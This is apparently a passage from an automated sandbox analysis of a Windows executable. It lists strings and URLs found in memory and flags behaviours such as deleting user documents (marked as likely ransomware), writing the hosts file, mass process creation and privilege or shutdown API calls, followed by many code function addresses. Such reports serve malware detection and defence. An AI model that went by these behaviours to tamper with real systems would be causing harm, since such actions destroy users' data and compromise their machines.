              Source: program.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: program.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE95C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: program.exe, 00000001.00000002.2114614682.000001B5FFA50000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000003.1765670308.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799219548.000001B5FEDBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1785586254.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1798717006.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1765670308.000001B5FEDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3B0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/m
              Source: program.exe, 00000001.00000003.1848103473.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106725604.000001B5FE3A9000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104079256.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851400732.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozill
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE28A000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE28A000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002700653.000001B5FE28A000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE28A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: program.exe, 00000001.00000003.1848103473.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106725604.000001B5FE3A9000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104079256.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851400732.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106525715.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106725604.000001B5FE3A9000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759741955.000001B5FEDB8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104079256.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002183639.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851400732.000001B5FE3A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: program.exe, 00000001.00000002.2114614682.000001B5FFA8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE95C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2118578234.00007FFDFB42A000.00000004.00000001.01000000.0000000F.sdmp, program.exe, 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\DVWHKMNFNN.docxJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\HTAGVDFUIE.docxJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\WUTJSCBCFX.pdfJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 62

              System Summary

              barindex
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE73A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF64FE73A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,83_2_00007FF64FE9B57C
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75010000_2_00007FF6B7501000
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75269640_2_00007FF6B7526964
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75089E00_2_00007FF6B75089E0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75240AC0_2_00007FF6B75240AC
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75218740_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75180E40_2_00007FF6B75180E4
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75208C80_2_00007FF6B75208C8
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75187940_2_00007FF6B7518794
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7511F600_2_00007FF6B7511F60
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75117400_2_00007FF6B7511740
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75098000_2_00007FF6B7509800
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7519EA00_2_00007FF6B7519EA0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7525E7C0_2_00007FF6B7525E7C
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75297280_2_00007FF6B7529728
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B751DEF00_2_00007FF6B751DEF0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75135A00_2_00007FF6B75135A0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B751E5700_2_00007FF6B751E570
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7511D540_2_00007FF6B7511D54
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750ACAD0_2_00007FF6B750ACAD
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750A4740_2_00007FF6B750A474
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7515D300_2_00007FF6B7515D30
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7511B500_2_00007FF6B7511B50
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75264180_2_00007FF6B7526418
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75208C80_2_00007FF6B75208C8
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7525C000_2_00007FF6B7525C00
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7512C100_2_00007FF6B7512C10
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7523C100_2_00007FF6B7523C10
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B751DA5C0_2_00007FF6B751DA5C
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750A2DB0_2_00007FF6B750A2DB
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75139A40_2_00007FF6B75139A4
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75121640_2_00007FF6B7512164
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75119440_2_00007FF6B7511944
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75010001_2_00007FF6B7501000
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75269641_2_00007FF6B7526964
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75240AC1_2_00007FF6B75240AC
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75218741_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75180E41_2_00007FF6B75180E4
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75208C81_2_00007FF6B75208C8
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75187941_2_00007FF6B7518794
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7511F601_2_00007FF6B7511F60
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75117401_2_00007FF6B7511740
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75098001_2_00007FF6B7509800
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7519EA01_2_00007FF6B7519EA0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7525E7C1_2_00007FF6B7525E7C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75297281_2_00007FF6B7529728
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B751DEF01_2_00007FF6B751DEF0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75135A01_2_00007FF6B75135A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B751E5701_2_00007FF6B751E570
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7511D541_2_00007FF6B7511D54
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750ACAD1_2_00007FF6B750ACAD
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750A4741_2_00007FF6B750A474
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7515D301_2_00007FF6B7515D30
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7511B501_2_00007FF6B7511B50
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75264181_2_00007FF6B7526418
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75208C81_2_00007FF6B75208C8
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7525C001_2_00007FF6B7525C00
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7512C101_2_00007FF6B7512C10
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7523C101_2_00007FF6B7523C10
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B751DA5C1_2_00007FF6B751DA5C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750A2DB1_2_00007FF6B750A2DB
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75139A41_2_00007FF6B75139A4
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75121641_2_00007FF6B7512164
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75119441_2_00007FF6B7511944
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75089E01_2_00007FF6B75089E0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAF103501_2_00007FFDFAF10350
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE613001_2_00007FFDFAE61300
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE622701_2_00007FFDFAE62270
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE619501_2_00007FFDFAE61950
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFB4290601_2_00007FFDFB429060
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFBAB33C01_2_00007FFDFBAB33C0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007A5C001_2_00007FFE007A5C00
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761D931_2_00007FFE00761D93
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007616FE1_2_00007FFE007616FE
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007687201_2_00007FFE00768720
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0076116D1_2_00007FFE0076116D
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007989201_2_00007FFE00798920
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007D88701_2_00007FFE007D8870
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007616181_2_00007FFE00761618
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761EE21_2_00007FFE00761EE2
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007626171_2_00007FFE00762617
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761A0F1_2_00007FFE00761A0F
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0076149C1_2_00007FFE0076149C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007DAC801_2_00007FFE007DAC80
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761B541_2_00007FFE00761B54
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761CBC1_2_00007FFE00761CBC
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0076117C1_2_00007FFE0076117C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007627021_2_00007FFE00762702
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007CD2D01_2_00007FFE007CD2D0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007617F81_2_00007FFE007617F8
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007624DC1_2_00007FFE007624DC
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761C121_2_00007FFE00761C12
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007D36501_2_00007FFE007D3650
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007613DE1_2_00007FFE007613DE
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007616541_2_00007FFE00761654
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007621C61_2_00007FFE007621C6
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007615961_2_00007FFE00761596
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00827A201_2_00007FFE00827A20
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007AD9801_2_00007FFE007AD980
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0078BAE01_2_00007FFE0078BAE0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007A9A601_2_00007FFE007A9A60
